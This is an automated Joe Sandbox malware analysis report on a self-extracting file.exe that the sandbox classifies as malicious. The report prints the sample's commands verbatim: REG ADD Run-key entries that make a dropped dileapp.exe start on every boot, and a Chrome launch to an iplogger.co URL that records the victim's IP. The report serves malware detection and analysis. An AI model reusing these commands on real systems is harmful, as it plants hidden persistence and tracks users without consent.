Windows Analysis Report
file.exe

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "

Source: C:\Users\user\Desktop\file.exe	Command line argument: sfxname	0_2_0088C131
Source: C:\Users\user\Desktop\file.exe	Command line argument: sfxstime	0_2_0088C131
Source: C:\Users\user\Desktop\file.exe	Command line argument: STARTDLG	0_2_0088C131

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Windows\win.ini

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: file.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1980,i,4637800445937414229,16644580557611955956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1980,i,4637800445937414229,16644580557611955956,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ndfapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 4963581 > 1048576

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_3980828

Uses cmd line tools excessively to alter registry or file data

Source: SourceMod_Setup.exe.0.dr

Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088D8B6 push ecx; ret		0_2_0088D8C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088CDF0 push eax; ret		0_2_0088CE0E

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Dropped PE file which has not been started: C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0087A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0087A273
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0088A537

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0088C8D5 VirtualQuery,GetSystemInfo,

0_2_0088C8D5

Source: file.exe, 00000000.00000003.1682564615.00000000013F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.1682564615.00000000013F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_0-23536

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0088DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0088DA75

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00894A5A mov eax, dword ptr fs:[00000030h]

0_2_00894A5A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00898AAA GetProcessHeap,

0_2_00898AAA

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0088DA75
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088DBC3 SetUnhandledExceptionFilter,	0_2_0088DBC3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00895B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00895B53
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0088DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0088DD7C

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\s.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1tJFB4	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0088D8CB cpuid

0_2_0088D8CB

Source: C:\Users\user\Desktop\file.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0088932F

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0088C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

0_2_0088C131

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0087A8E0 GetVersionExW,

0_2_0087A8E0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	12 Command and Scripting Interpreter	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Modify Registry	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	29%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exe	25%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://iplogger.co/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.250.181.100	true	false		high
iplogger.co	104.21.82.93	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iplogger.co/1tJFB4	false		unknown
https://iplogger.co/favicon.ico	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.opengis.net/gml	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
https://github.com/go-sql-driver/mysql/wiki/strict-modeThe	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
https://discord.com/illegal	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
http://www.collada.org/2005/11/COLLADASchema	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
http://www.topografix.com/GPX/1/1	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
http://earth.google.com/kml/2.2	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
http://earth.google.com/kml/2.0	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
http://earth.google.com/kml/2.1	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
http://www.opengis.net/kml/2.2	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
https://status.discord.com/api/v2/i/o	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
https://cdn.discordapp.com/illegal	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
https://github.com/go-sql-driver/mysql/wiki/old_passwords	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high
https://discord.com/developers/docs/reference#authentication-example-bot-token-authorization-header	file.exe, 00000000.00000003.1678988930.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, SourceMod_Setup.exe.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.82.93	iplogger.co	United States	13335	CLOUDFLARENETUS	false
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
172.67.167.249	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565648
Start date and time:	2024-11-30 12:46:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal68.winEXE@23/5@6/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 88 Number of non-executed functions: 82
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.238, 64.233.165.84, 34.104.35.123, 199.232.210.172, 192.229.221.95, 172.217.17.67, 172.217.17.78
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:47:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
11:47:10	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
11:47:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe

Joe Sandbox View / Context

IPs

